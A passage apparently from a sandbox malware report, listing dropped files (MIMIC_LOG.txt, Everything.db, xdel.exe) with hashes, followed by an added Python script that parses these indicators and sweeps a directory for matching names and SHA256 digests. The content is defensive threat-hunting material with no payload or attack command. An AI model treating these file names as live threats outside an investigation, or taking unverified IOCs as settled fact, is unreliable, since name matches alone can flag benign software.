  • C:\Users\Admin\AppData\Local\{BD4CA196-EDBC-D2B9-11F9-B4A6B2B1DF53}\Everything.db
    Filesize: 15.0MB
    MD5: 630923568cc4a1deffaebc08d9bd48e1
    SHA1: 20928b87658f1a68c63203a5b1eb8d22f72e990d
    SHA256: 9184436d6e26fadf53c8fe297fec0e30c02f35b549bc5f61647b0f736cb49591
    SHA512: c6ab7500db87606a650369bad498864b3cb38ad5edb937e367b7ec3c59509279490efb6e934d595de28d8f642a259dbe8bbd4a836b9f4fe907f20449a2e2317c

  • C:\Users\Admin\AppData\Local\{BD4CA196-EDBC-D2B9-11F9-B4A6B2B1DF53}\Everything.db
    Filesize: 15.0MB
    MD5: 6d0ffb4446d6a3cebab03a01fb32f723
    SHA1: fcbead0fd160e4d5e023bf5e9c576d991f500ac4
    SHA256: fea0ff5214d4adb3d64533ae25570ef8e4ce57ca4e64e0063619463fb5cad875
    SHA512: 7d4f98aa8afc903278f23472f33af186eb9033493a8fb95e6bd80975a0ba2f17bcff9887e591551d09ac8405c5e2153cd9a7384647c4d2dcbb6314b4f3807683

                  • C:\Users\Admin\AppData\Local\{BD4CA196-EDBC-D2B9-11F9-B4A6B2B1DF53}\Everything.ini

                    Filesize

                    20KB

                    MD5

                    5235d7fc918bb46b3f4558552e6a06be

                    SHA1

                    520d21fae3a9b77fd60d52ff025e57cd81078cf9

                    SHA256

                    b0c78e0932d80cf5ba6bf08fea02c8e294cf46dcc012192ac598584e24e75b23

                    SHA512

                    2f7874a3f16df823fc4fbf0747defc6c0abb88de57e9b08f83773805c1d11dea9651b0a58e6a9b249486980b020ae8844ddcfc725f7874eff645180c174ed917

                  • C:\Users\Admin\AppData\Local\{BD4CA196-EDBC-D2B9-11F9-B4A6B2B1DF53}\session.tmp

                    Filesize

                    32B

                    MD5

                    c3d65ab822456c8d02b6b8531af4d4d6

                    SHA1

                    0469918516223cf0f0b3175ea71901c8bc86721f

                    SHA256

                    c77d4868e43e4602c8dfa45466fa6eb717bdcfab2bbf047a2768f6926ee0490e

                    SHA512

                    ec16f58e6590175f33833c8ef0f75a10b65e4980e60ad11010a2baf13ec92f0a49c306974af43e91e9bf0fced9e43c525e8c0ba266799f6844b0c62d2ad0a75b

                  • C:\temp\MIMIC_LOG.txt

                    Filesize

                    31KB

                    MD5

                    e00275ebd927a26ada6c18894710db09

                    SHA1

                    e762d932a4170d84a1ca2b7e58af3d6bfb56a4cb

                    SHA256

                    391afd7fe4d5a44af548ebe418e0d69b780dad6e408d2da1dffe71b9af4b9dc3

                    SHA512

                    7160bf70cada166f9840a0665ef6fedc654ea6fe584ad5b3c6bdfa929782cbbe8225c1649b58f80f6e645d8e4813134d66a373e0aa54d46fe7db0dc2416e4f2e

                  • C:\temp\MIMIC_LOG.txt

                    Filesize

                    31KB

                    MD5

                    7736c40c3925e77bb894e2d6666132f5

                    SHA1

                    654945730467ff9a3265182eab98b0ab14773569

                    SHA256

                    b2220c93494fde1b628c98031a0148e3f08a4ae4f943c20c856590e17e57d1ed

                    SHA512

                    707722dc5fac305241d6c3aea4dcb62e500c8643a48a5557ef34f18df2c9de3a370924cd0c26dcc02252540d5386df508d650916f65a50714cdf6a5d04d49527

                  • memory/4876-143-0x0000025B5C170000-0x0000025B5C186000-memory.dmp

                    Filesize

                    88KB

                  • memory/4876-137-0x0000025B5C1A0000-0x0000025B5C1EA000-memory.dmp

                    Filesize

                    296KB

                  • memory/4876-136-0x0000025B5C140000-0x0000025B5C14A000-memory.dmp

                    Filesize

                    40KB

                  • memory/4876-108-0x0000025B5C0B0000-0x0000025B5C136000-memory.dmp

                    Filesize

                    536KB

                  • memory/4876-127-0x0000025B5C250000-0x0000025B5C354000-memory.dmp

                    Filesize

                    1.0MB

                  • memory/4876-118-0x0000025B5BFF0000-0x0000025B5C000000-memory.dmp

                    Filesize

                    64KB

                  • memory/4876-109-0x0000025B5C000000-0x0000025B5C022000-memory.dmp

                    Filesize

                    136KB
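The dropped-file listing above is an IOC set, and two of its paths (Everything.db and MIMIC_LOG.txt) appear twice with different hashes because the sandbox captured more than one version of the file during the run. As an added example (not code from the report or from the sandbox vendor), the following Python script parses that listing format into records, validates each hash for length and charset, flags paths listed with more than one SHA256, and sweeps a directory tree by file name and SHA256. The text in REPORT_EXCERPT is copied from the listing with only the hashes used here kept; the function names and the directory being swept are assumptions of this example.

```python
# Added example, not part of the sandbox report: turn the dropped-file listing
# above into IOC records and sweep a directory tree for them. REPORT_EXCERPT is
# copied from the report (only the hashes used here are kept); function names
# and the directory swept are this example's own assumptions.
import hashlib
import os
import re
from dataclasses import dataclass, field

HASH_LENGTHS = {"MD5": 32, "SHA1": 40, "SHA256": 64, "SHA512": 128}

REPORT_EXCERPT = r"""
• C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Everything32.dll
  Filesize
  84KB
  MD5
  3b03324537327811bbbaff4aafa4d75b
  SHA256
  8cae8a9740d466e17f16481e68de9cbd58265863c3924d66596048edfd87e880
• C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\xdel.exe
  Filesize
  350KB
  SHA256
  e8eaa39e2adfd49ab69d7bb8504ccb82a902c8b48fbc256472f36f41775e594c
• C:\temp\MIMIC_LOG.txt
  Filesize
  31KB
  SHA256
  391afd7fe4d5a44af548ebe418e0d69b780dad6e408d2da1dffe71b9af4b9dc3
• C:\temp\MIMIC_LOG.txt
  Filesize
  31KB
  SHA256
  b2220c93494fde1b628c98031a0148e3f08a4ae4f943c20c856590e17e57d1ed
• memory/4876-143-0x0000025B5C170000-0x0000025B5C186000-memory.dmp
  Filesize
  88KB
"""

@dataclass
class Artifact:
    path: str
    size: str = ""
    hashes: dict = field(default_factory=dict)

    @property
    def name(self) -> str:
        # Basename of the Windows path, independent of the host OS.
        return self.path.replace("\\", "/").rsplit("/", 1)[-1].lower()

def parse_listing(text: str) -> list:
    """Parse '• path / Filesize / <size> / MD5 / <hash> ...' blocks; memory dumps are skipped."""
    artifacts, current, label = [], None, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line.startswith("•"):
            current = Artifact(path=line[1:].strip())
            if not current.path.startswith("memory/"):  # size only, not an IOC
                artifacts.append(current)
            label = None
        elif line == "Filesize" or line in HASH_LENGTHS:
            label = line
        elif current is not None and label is not None:
            if label == "Filesize":
                current.size = line
            elif re.fullmatch(r"[0-9a-f]{%d}" % HASH_LENGTHS[label], line):
                current.hashes[label] = line
            else:
                raise ValueError(f"malformed {label} for {current.path}: {line}")
            label = None
    return artifacts

def rewritten_paths(artifacts: list) -> list:
    """Paths listed more than once with differing SHA256 (file changed during the run)."""
    seen = {}
    for a in artifacts:
        seen.setdefault(a.path, set()).add(a.hashes.get("SHA256"))
    return sorted(p for p, digests in seen.items() if len(digests) > 1)

def sweep(root: str, artifacts: list) -> list:
    """Walk root and return sorted (path, sha256, reasons). A name-only hit is a
    lead (the Everything SDK ships DLLs named Everything32/64.dll); a sha256 hit
    matches the report."""
    names = {a.name for a in artifacts}
    sha256s = {a.hashes["SHA256"] for a in artifacts if "SHA256" in a.hashes}
    hits = []
    for dirpath, _, files in os.walk(root):
        for fn in files:
            full = os.path.join(dirpath, fn)
            with open(full, "rb") as fh:
                digest = hashlib.sha256(fh.read()).hexdigest()
            reasons = [r for r, ok in (("name", fn.lower() in names),
                                       ("sha256", digest in sha256s)) if ok]
            if reasons:
                hits.append((full, digest, reasons))
    return sorted(hits)
```

To hunt on a live host, call `sweep(r"C:\", parse_listing(<full listing>))` and treat name-only hits on the Everything DLLs as leads to confirm by hash; the `7ZipSfx.000` directory name, `xdel.exe` and `MIMIC_LOG.txt` in `C:\temp` are the stronger name-based signals in this listing.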